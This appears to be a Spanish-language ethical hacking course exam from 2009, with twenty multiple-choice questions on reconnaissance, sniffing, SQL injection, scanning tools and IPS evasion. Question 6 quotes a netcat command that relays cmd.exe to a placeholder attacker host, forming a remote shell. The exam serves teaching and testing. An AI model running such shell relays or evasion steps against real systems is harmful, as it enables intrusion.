Examen Final Curso :
Ethical Hacking
Nombre del Alumno : ...................................................................................................... Fecha : 21-22/9/09
Indicaciones : A. Marcar las alternativas seleccionadas con un circulo alrededor de cada opción. B. Considerar siempre la(s) alternativa(s) correcta(s) o la(s) mejor(es) alternativa(s). C. El examen es individual. D. La duración del examen es de 20 minutos. 1. En un exploit hecho en C Ud. encuentra una sección llena de códigos en hexadecimal (\x##), esta seccion corresponde a : A. La DLL que se explotará. B. La firma que deja el exploit. C. Padding. D. El shellcode. 2. Dónde debería buscar un evaluador de seguridad la información que podría ser usada por un atacante contra una organización ? (Seleccionar todas las que aplican) A. Salones de chat. B. Bases de datos WHOIS. C. Grupos de Noticias. D. Sitios Web. E. Motores de búsqueda. F. El propio sitio web de la organización. 3. Cuáles de las siguientes actividades NO es considerada footprint pasivo ?(Seleccionar todas las que aplican) A. Buscar dentro de la basura para encontrar información que ha sido descartada. B. Buscar en el sitio financiero de Yahoo Financial para encontrar activos. C. Escanear un rango de direcciones IP que se encontraron en la base de datos DNS. D. Ejecutar múltiples búsquedas usando motores de búsquedas. 4. Durante el footprint de una red, qué puerto indica la posibilidad de hacer una transferencia de zona ? A. 53 UDP B. 53 TCP C. 25 UDP D. 25 TCP E. 161 UDP F. 22 TCP G. 60 TCP 5. Mientras se ejecuta un ping sweep en una subred, se reciben respuestas ICMP Código 3 Tipo 13 para todos los pings enviados. Cuál es la causa más frecuente para obtener esta respuesta ? A. El firewall esta rechazando los paquetes. B. Un IDS-inlines esta rechazando los paquetes. C. Un router en el ISP esta bloqueando ICMP con ACLs. D. El host no responde a paquetes ICMP. 6. La línea nc ip_attacker 80 | cmd.exe | nc ip_attacker 25 corresponde al uso de netcat para A. Un canal encubierto. B. Un escaneo de puertos. C. Descarga de un archivo. D. RFI/LFI 7. En Linux, cuáles son los 3 comandos más comúnes que los hackers usualmente “troyanizan” : A. car, xterm, grep B. netstat, ps, top C. vmware, sed, less D. xterm, ps, nc 8. Fidia fue contratada para ejecutar una evaluación de seguridad interna. Rapidamente se da cuenta que usan switches en vez de hubs. Esto la limita en su habilidad para obtener información mediante el sniffing de la red. Cuál de las siguientes técnicas puede usar Fidia para obtener información de una red basada en switches o para deshabilitar alguna de las características de aislamiento de los switches ? (Escoja 2) A. Ethernet Zapping B. MAC Flooding C. Sniffing en modo promiscuo D. ARP Spoofing
9. Julio ha sido contratado para evaluar la seguridad de una aplicación web. Julio se da cuenta que el sitio es dinámico e infiere que deben estar haciendo uso de una base de datos como backend de la aplicación. Julio quiere validar sí es posible hacer una inyección de SQL. Cuál es el primer caracter que Julio debería usar para intentar quebrar los requerimientos SQL ? A. Semi Column B. Double Quote C. Single Quote D. Exclamation Mark 10. En qué modo debe operar una tarjeta de red para realizar un sniffing ? A. Compartido. B. Sin Encriptación. C. Abierto. D. Promiscuo. 11. Un Idle Scan es una función propia de : A. nmap B. scapy C. hping D. todos los anteriores 12. Ud. requiere validar los parches instalados en un MS Windows, la funcionalidad de Local Security Checks le sirve para esta validación A. SI B. NO 13. El URL http://1209882139 es válido A. SI B. NO 14. Ud. se encuentra en la búsqueda de exploits de una fuente aproximadamente confiable, cual de estas puede ser A. cve.mitre.org B. www.kartoo.org C. ww.milw0rm.com D. www.open-sec.com 15. En la explotación de una vulnerabilidad, que describe mejor al payload A. Sección que realiza el buffer overflow B. Sección que prepara el target C. Sección que implementa el ataque, por ejemplo, un shell reverso D. Sección que realiza la evasión de intrusos 16. En que puerto escucha por default Paros A. 3128 B. 8080 C. 31337 D. 8000 17. Cual es la opción que se debe activar en Nessus para evitar afectar la disponibilidad de los hosts que se evaluan A. No DoS B. Secure Checks C. Safe Checks D. Prevent Insane Checks 18. Que tipo de Flag TCP no es valido A. ACK B. SYN C. RST D. END 19. Ud. tiene acceso a un host Linux como un usuario simple y tiene instalado nmap en forma correcta y operativa, ejecuta : nmap -v -sS 192.168.254.209 y obtiene un mensaje de error y no ejecuta el programa, cual es la causa mas frecuente ? A. Es una versión antigua de nmap B. Se requiere acceso como administrator C. Se requiere tener privelegios de root D. Esta pasando por un firewall de host 20. Ud. quiere evitar ser bloqueado por un IPS mientras realiza un ethical hacking, que medida no es adecuada en estas situaciones A. Usar Unicorn porque hace el escaneo más rápido B. No escanear los puertos más usados porque siempre estan protegidos C. Fragmentar los paquetes que se envian D. Preguntar al admin de la red cuáles son las aplicaciones que utiliza